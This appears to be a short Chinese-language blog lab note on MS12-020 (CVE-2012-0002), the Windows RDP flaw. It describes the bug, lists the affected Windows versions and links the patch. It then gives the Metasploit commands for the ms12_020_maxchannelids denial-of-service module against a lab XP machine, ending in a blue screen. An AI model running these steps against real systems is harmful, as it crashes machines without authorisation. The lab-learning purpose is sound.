關於MS12-020一次簡單嘗試

正好這幾天不忙，就想着慢慢學習，再寫點簡單的東西，進行總結記錄。

此次嘗試的是MS12-020，可致使BSOD（死亡藍屏）

MS12-020全稱Microsoft Windows遠程桌面協議RDP遠程代碼執行漏洞，

遠程桌面協議（RDP, Remote Desktop Protocol）是一個多通道（multi-channel）的協議，讓用戶（客戶端或稱「本地電腦」）連上提供微軟終端機服務的電腦（服務器端或稱「遠程電腦」）。Windows在處理某些對象時存在錯誤，可經過特製的RDP報文訪問未初始化的或已經刪除的對象，致使任意代碼執行，而後控制系統。

CVE ID: CVE-2012-0002

影響範圍：開了RDP的Microsoft Windows XP Professional /Microsoft Windows XP Home/ Microsoft Windows Server 2003 Standard Edition /Microsoft Windows Server 2003 Enterprise Edition /Microsoft Windows Server 2003 Datacenter Edition /Microsoft Windows 7（綠盟說是影響全版本windows系統，當時win8和win10還未出）

補丁地址：https://technet.microsoft.com/library/security/ms12-020

首先肯定kali爲攻擊機，windows xp professional  service park 2爲靶機。固然，開啓了遠程桌面，也沒打補丁。

接下來，打開msfconsole,輸入命令search ms12-020

可選擇的模塊有2個，咱們先選擇第一個進行。嘗試。

輸入命令：use  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  而後回車

進入這個模塊後，查看當下的配置。

show options 

而後設置靶機IP。

set RHOST 192.168.19.130

最後，輸入run,回車運行。

當提示seems down時，查看靶機狀況。

 如圖所示，RPDWD.SYS引發的藍屏。